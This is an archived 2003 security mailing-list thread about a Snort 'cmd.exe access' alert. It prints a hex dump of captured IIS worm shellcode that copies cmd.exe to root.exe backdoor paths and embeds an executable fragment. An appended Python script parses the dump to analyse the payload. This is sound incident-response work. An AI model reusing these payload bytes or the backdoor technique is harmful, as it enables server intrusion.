Incidents
RE: strange cmd.exe access Jun 05 2003 04:22AM
MacDougall, Shane (smacdougall idanalytics com)
We saw the exact same packets attack our network from 3 different hosts.
It appears that somehow this attack successfully breached a "hardened"
IIS box. URLScan reported several instances of typical Code Red-type traffic from the
attacking IPs, and although the IIS log was scrubbed of some suspicious
activity, our syslogs and IDS indicated that the attack was successful.

Any info on these attack packets would be greatly appreciated.

Regards.
Shane

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shane MacDougall
Lead Security Officer
ID Analytics
San Diego, California USA
Direct: (858) 427-2860
Toll Free: 866-240-4484 x 2860
Fax: 858-427-2899

-----Original Message-----
From: Q [mailto:quentyn (at) the-q.co (dot) uk]
Sent: Thursday, May 29, 2003 12:10 PM
To: incidents (at) securityfocus (dot) com
Subject: strange cmd.exe access

Hi I saw this packet

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841
ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload: length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X........t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

What is strange is that the cmd.exe / root.exe stuff is halfway through,
with some other code before it.

The IP it hit was not mapped to anything (I believe it is unused), so this
cannot have been part of another TCP conversation.

Any ideas?

--
There should be a sig here, but it got bored and wandered off
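Added example, not part of either post: a small Python triage script for the dump Q pasted. Snort sid 1002 ("WEB-IIS cmd.exe access") is a plain content match on the string cmd.exe, so it fires on any segment carrying it, including a mid-stream data segment like this one (flags=A only, no HTTP request line in the payload). The script parses the `offset : hex : ascii` lines and then does the two things that explain why cmd.exe only appears halfway through: it finds every `E8 n 00 00 00` call-over-string site (the API names are pushed this way into import-resolution stubs, and the root.exe paths are pushed the same way afterwards), and it checks whether the MZ at 0x310 is a well-formed PE. The excerpt lines are copied verbatim from the dump above; reading `call [ebp-8]` as a GetProcAddress-style resolver and `call [ebp-0xC]` as a LoadLibrary-style loader is an inference from the stub shape (push module handle; call; store result), not something the post states.

```python
import re

# Excerpts of the hex dump printed in the post above, copied verbatim (offset : 16 bytes : ASCII).
# Blank lines mark where dump lines were skipped; the complete dump can be pasted in unchanged.
DUMP = r"""
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl

270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..

310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
"""

HEX_LINE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*(.*)$")
HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")
RESOLVE = b"\xff\x55\xf8\x89\x45"  # call [ebp-8]; mov [ebp+disp8], eax
LOAD = b"\xff\x55\xf4\x89\x45"     # call [ebp-0xC]; mov [ebp+disp8], eax

def parse_dump(text):
    """Parse dump lines into (base_offset, bytes) segments, one per blank-separated block.
    Each line's offset must equal the running length, so a transcription gap fails loudly."""
    segments, base, buf = [], None, bytearray()
    for raw in text.splitlines():
        if not raw.strip():
            if buf:
                segments.append((base, bytes(buf)))
            base, buf = None, bytearray()
            continue
        m = HEX_LINE.match(raw)
        if not m:
            raise ValueError(f"not a dump line: {raw!r}")
        off = int(m.group(1), 16)
        if base is None:
            base = off
        elif off != base + len(buf):
            raise ValueError(f"offset {off:#x} does not follow {base + len(buf):#x}")
        for n, tok in enumerate(m.group(2).split()):
            if n == 16 or not HEX_BYTE.fullmatch(tok):
                break  # 16 bytes consumed, or the ASCII column reached
            buf.append(int(tok, 16))
    if buf:
        segments.append((base, bytes(buf)))
    return segments

def find_call_over_string(base, data):
    """Find 'E8 n 00 00 00' followed by an n-byte NUL-terminated string.
    CALL rel32 pushes the address of the next instruction, here the string, as the return
    address, so the callee gets a pointer to it as its first stack argument and the shellcode
    needs no absolute addresses. The bytes following the string classify the site."""
    sites, i = [], 0
    while i + 5 <= len(data):
        n = data[i + 1] if data[i] == 0xE8 else 0
        s = data[i + 5:i + 5 + n]
        if (n >= 2 and data[i + 2:i + 5] == b"\0\0\0" and len(s) == n and s[-1] == 0
                and all(0x20 <= c < 0x7F for c in s[:-1])):
            tail = data[i + 5 + n:i + 5 + n + 9]
            if tail[:2] == b"\xff\x75" and tail[3:8] == RESOLVE:
                kind = "resolve-import"   # push [ebp+disp8]; call [ebp-8]; store: GetProcAddress-style (inferred)
            elif tail[:5] == LOAD:
                kind = "load-module"      # call [ebp-0xC]; store handle: LoadLibrary-style (inferred)
            else:
                kind = "string-argument"  # pointer consumed by whatever code follows
            sites.append((base + i + 5, s[:-1].decode("ascii"), kind))
            i += 5 + n
        else:
            i += 1
    return sites

def find_embedded_pe(base, data):
    """Locate MZ stubs and check whether e_lfanew really points at a PE signature.
    If not, the embedded file is not a loadable image on the wire and must not be carved as-is."""
    pe_sigs = [base + m.start() for m in re.finditer(rb"PE\x00\x00", data)]
    found = []
    for m in re.finditer(rb"MZ", data):
        off = m.start()
        lfanew = int.from_bytes(data[off + 0x3C:off + 0x40], "little") if off + 0x40 <= len(data) else None
        ok = lfanew is not None and data[off + lfanew:off + lfanew + 4] == b"PE\x00\x00"
        found.append({"mz": base + off, "e_lfanew": lfanew, "pe_sigs": pe_sigs, "well_formed": ok})
    return found

def analyze(text):
    """Run both passes over every segment; reported offsets are absolute within the capture."""
    segs = parse_dump(text)
    return {"sites": [s for b, d in segs for s in find_call_over_string(b, d)],
            "pe": [p for b, d in segs for p in find_embedded_pe(b, d)]}
```

Run over the full dump, the resolve-import sites read as the payload's import list (GlobalAddAtomA, CloseHandle, _lcreat, _lwrite, _lclose, GetSystemTime, then the WS2_32 and USER32 names), the three string-argument sites are "\CMD.EXE" and the two root.exe paths, and the MZ check reports that e_lfanew does not point at the "PE\0\0" sitting 0x27 bytes after it, so the embedded executable cannot be carved from this packet as-is.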

Copyright 2009, SecurityFocus